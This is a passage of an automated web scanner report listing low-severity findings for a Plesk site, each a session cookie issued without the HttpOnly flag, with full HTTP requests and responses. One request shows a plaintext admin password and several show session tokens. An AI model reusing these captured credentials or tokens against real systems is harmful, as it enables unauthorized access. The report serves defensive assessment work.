Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

3.22. http://vulnerarable.plesk.smb.10.2.0.site:2006/custom/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/custom/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SessionID=42b54cb11fc3aedbd; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /custom/ HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login?returnUrl=%2Fcustom%2F
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Tue, 12 Oct 2010 01:41:01 GMT
Connection: close

3.23. http://vulnerarable.plesk.smb.10.2.0.site:2006/external_login.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/external_login.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SessionID=42b54cb11fc3aedbd; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /external_login.php HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://vulnerarable.plesk.smb.10.2.0.site:8880/domains/sitebuilder_edit.php?dom_id=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj; PLESKSESSID=10321169792bce25daa15603ea9ba645; locale=en-US
Content-Length: 111

SiteID=78806f0057ebcbb04597bd12795bd6a6&Login=admin&Password=Nose1Dive&Skin=WinXPReloadedCompact&Language=en-US

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Wizard/Edit?siteId=78806f0057ebcbb04597bd12795bd6a6
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:07:01 GMT
Connection: close

3.24. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/bullet.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/bullet.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SessionID=23074cb14ecc5df3f; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/bullet.gif?template=personal-018&colorScheme=green&header=headers1&button=buttons1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: keep-alive
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php?1286688492090
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains; allowUnsupportedBrowser=yes; SessionID=23074cb14ecc5df3f; testCookie=test

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login?returnUrl=%2Fsites%2F78%2F78806f0057ebcbb04597bd12795bd6a6%2F__edit%2Fimages%2Fbullet.gif%3Ftemplate%3Dpersonal-018%26colorScheme%3Dgreen%26header%3Dheaders1%26button%3Dbuttons1
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=23074cb14ecc5df3f; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 06:05:57 GMT
Connection: close

3.25. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/header.jpg previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/header.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SessionID=23074cb14ecc5df3f; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/header.jpg?template=personal-018&colorScheme=green&header=headers1&button=buttons1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: keep-alive
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php?1286688492090
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains; allowUnsupportedBrowser=yes; SessionID=23074cb14ecc5df3f; testCookie=test

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login?returnUrl=%2Fsites%2F78%2F78806f0057ebcbb04597bd12795bd6a6%2F__edit%2Fimages%2Fheader.jpg%3Ftemplate%3Dpersonal-018%26colorScheme%3Dgreen%26header%3Dheaders1%26button%3Dbuttons1
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=23074cb14ecc5df3f; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 06:06:59 GMT
Connection: close

3.26. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/hleft.jpg previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/hleft.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SessionID=23074cb14ecc5df3f; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/hleft.jpg?template=personal-018&colorScheme=green&header=headers1&button=buttons1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: keep-alive
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php?1286688492090
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains; allowUnsupportedBrowser=yes; SessionID=23074cb14ecc5df3f; testCookie=test

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login?returnUrl=%2Fsites%2F78%2F78806f0057ebcbb04597bd12795bd6a6%2F__edit%2Fimages%2Fhleft.jpg%3Ftemplate%3Dpersonal-018%26colorScheme%3Dgreen%26header%3Dheaders1%26button%3Dbuttons1
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=23074cb14ecc5df3f; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 06:06:54 GMT
Connection: close

3.27. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/htop.jpg previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/htop.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SessionID=23074cb14ecc5df3f; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/htop.jpg?template=personal-018&colorScheme=green&header=headers1&button=buttons1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: keep-alive
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php?1286688492090
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains; allowUnsupportedBrowser=yes; SessionID=23074cb14ecc5df3f; testCookie=test

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login?returnUrl=%2Fsites%2F78%2F78806f0057ebcbb04597bd12795bd6a6%2F__edit%2Fimages%2Fhtop.jpg%3Ftemplate%3Dpersonal-018%26colorScheme%3Dgreen%26header%3Dheaders1%26button%3Dbuttons1
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=23074cb14ecc5df3f; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 06:06:48 GMT
Connection: close

3.28. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/spacer.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/spacer.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SessionID=23074cb14ecc5df3f; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/spacer.gif?template=personal-018&colorScheme=green&header=headers1&button=buttons1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: keep-alive
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php?1286688492090
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains; allowUnsupportedBrowser=yes; SessionID=23074cb14ecc5df3f; testCookie=test

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login?returnUrl=%2Fsites%2F78%2F78806f0057ebcbb04597bd12795bd6a6%2F__edit%2Fimages%2Fspacer.gif%3Ftemplate%3Dpersonal-018%26colorScheme%3Dgreen%26header%3Dheaders1%26button%3Dbuttons1
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=23074cb14ecc5df3f; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 06:05:57 GMT
Connection: close

3.29. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_02.jpg previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_02.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SessionID=23074cb14ecc5df3f; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_02.jpg?template=personal-018&colorScheme=green&header=headers1&button=buttons1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: keep-alive
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php?1286688492090
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains; allowUnsupportedBrowser=yes; SessionID=23074cb14ecc5df3f; testCookie=test

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login?returnUrl=%2Fsites%2F78%2F78806f0057ebcbb04597bd12795bd6a6%2F__edit%2Fimages%2Fxsk_02.jpg%3Ftemplate%3Dpersonal-018%26colorScheme%3Dgreen%26header%3Dheaders1%26button%3Dbuttons1
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=23074cb14ecc5df3f; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 06:06:39 GMT
Connection: close

3.30. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_06.jpg previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_06.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SessionID=23074cb14ecc5df3f; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_06.jpg?template=personal-018&colorScheme=green&header=headers1&button=buttons1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: keep-alive
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php?1286688492090
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains; allowUnsupportedBrowser=yes; SessionID=23074cb14ecc5df3f; testCookie=test

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login?returnUrl=%2Fsites%2F78%2F78806f0057ebcbb04597bd12795bd6a6%2F__edit%2Fimages%2Fxsk_06.jpg%3Ftemplate%3Dpersonal-018%26colorScheme%3Dgreen%26header%3Dheaders1%26button%3Dbuttons1
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=23074cb14ecc5df3f; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 06:06:57 GMT
Connection: close

3.31. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_10.jpg previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_10.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SessionID=23074cb14ecc5df3f; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_10.jpg?template=personal-018&colorScheme=green&header=headers1&button=buttons1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: keep-alive
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php?1286688492090
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains; allowUnsupportedBrowser=yes; SessionID=23074cb14ecc5df3f; testCookie=test

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login?returnUrl=%2Fsites%2F78%2F78806f0057ebcbb04597bd12795bd6a6%2F__edit%2Fimages%2Fxsk_10.jpg%3Ftemplate%3Dpersonal-018%26colorScheme%3Dgreen%26header%3Dheaders1%26button%3Dbuttons1
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=23074cb14ecc5df3f; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 06:06:49 GMT
Connection: close

3.32. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_13.jpg previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_13.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SessionID=23074cb14ecc5df3f; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_13.jpg?template=personal-018&colorScheme=green&header=headers1&button=buttons1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: keep-alive
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php?1286688492090
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains; allowUnsupportedBrowser=yes; SessionID=23074cb14ecc5df3f; testCookie=test

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login?returnUrl=%2Fsites%2F78%2F78806f0057ebcbb04597bd12795bd6a6%2F__edit%2Fimages%2Fxsk_13.jpg%3Ftemplate%3Dpersonal-018%26colorScheme%3Dgreen%26header%3Dheaders1%26button%3Dbuttons1
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=23074cb14ecc5df3f; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 06:07:07 GMT
Connection: close

3.33. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_19.jpg previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_19.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SessionID=23074cb14ecc5df3f; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_19.jpg?template=personal-018&colorScheme=green&header=headers1&button=buttons1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: keep-alive
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php?1286688492090
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains; allowUnsupportedBrowser=yes; SessionID=23074cb14ecc5df3f; testCookie=test

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login?returnUrl=%2Fsites%2F78%2F78806f0057ebcbb04597bd12795bd6a6%2F__edit%2Fimages%2Fxsk_19.jpg%3Ftemplate%3Dpersonal-018%26colorScheme%3Dgreen%26header%3Dheaders1%26button%3Dbuttons1
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=23074cb14ecc5df3f; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 06:07:02 GMT
Connection: close

3.34. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_22.jpg previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_22.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SessionID=23074cb14ecc5df3f; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_22.jpg?template=personal-018&colorScheme=green&header=headers1&button=buttons1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: keep-alive
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/page1.php?1286688492090
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains; allowUnsupportedBrowser=yes; SessionID=23074cb14ecc5df3f; testCookie=test

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login?returnUrl=%2Fsites%2F78%2F78806f0057ebcbb04597bd12795bd6a6%2F__edit%2Fimages%2Fxsk_22.jpg%3Ftemplate%3Dpersonal-018%26colorScheme%3Dgreen%26header%3Dheaders1%26button%3Dbuttons1
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=23074cb14ecc5df3f; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 06:06:42 GMT
Connection: close

3.35. http://vulnerarable.plesk.smb.10.2.0.site:2006/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_23.jpg previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/sites/78/78806f0057ebcbb04597bd12795bd6a6/__edit/images/xsk_23.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SessionID=23074cb14ecc5df3f; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

